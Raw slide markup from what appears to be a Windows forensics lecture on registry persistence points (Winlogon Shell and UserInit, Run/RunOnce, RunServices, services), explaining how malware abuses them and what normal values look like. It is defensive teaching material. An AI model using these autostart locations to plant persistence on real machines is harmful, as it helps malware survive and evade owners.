                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsNT</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CurrentVersion</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Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</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IniFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\system.ini\boot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log-on Key Value Names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047652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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Key Value Name</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="525135" y="2083976"/>
            <a:ext cx="8191049" cy="4189315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4243024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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>key value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is used by Windows to launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Initially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, it points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userinit.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which then launches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(a key value name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userinit.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is replaced by the malware, that script or executable will be able to take over the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login process</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key Value Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1578260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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shouldn’t be anything other than that. Though these are String values so identifying changes should be easier. </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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key Value Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3807385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2675467"/>
            <a:ext cx="8928992" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKCU\Software\Microsoft\Windows\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\Run </a:t>
            </a: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HKCU\Software\Microsoft\Windows\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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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HKLM\Software\Microsoft\Windows\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\Run </a:t>
            </a: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HKLM\Software\Microsoft\Windows\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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="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HKLM\Software\Microsoft\Windows\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\Policies\Explorer\Run</a:t>
            </a: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HKCU\Software\Microsoft\Windows\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\Policies\Explorer\Run</a:t>
            </a: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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunServices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Setup</a:t>
            </a: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HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\services</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Keys, ASEPs, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1692209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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are used to launch programs whenever a user logs on to the system, hence fall under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AutoStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Extension Points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>ASEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key will launch the program on every user logon, whereas the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key only executes once and then, the key is deleted.</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
